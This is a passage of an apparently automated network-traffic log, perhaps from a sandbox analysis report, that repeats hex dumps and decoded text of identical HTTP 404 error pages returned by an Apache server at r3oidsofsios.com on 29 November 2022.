3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:35 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:37 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:37 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:37 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:38 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:38 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:38 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:38 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:39 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:39 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:40 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:40 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC 